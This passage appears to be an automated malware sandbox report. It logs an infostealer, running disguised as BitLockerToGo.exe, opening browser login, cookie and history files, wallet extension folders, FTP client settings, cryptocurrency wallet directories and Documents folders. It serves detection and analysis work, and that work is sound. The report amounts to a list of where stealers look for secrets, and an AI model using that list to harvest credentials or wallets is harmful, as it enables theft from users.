                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
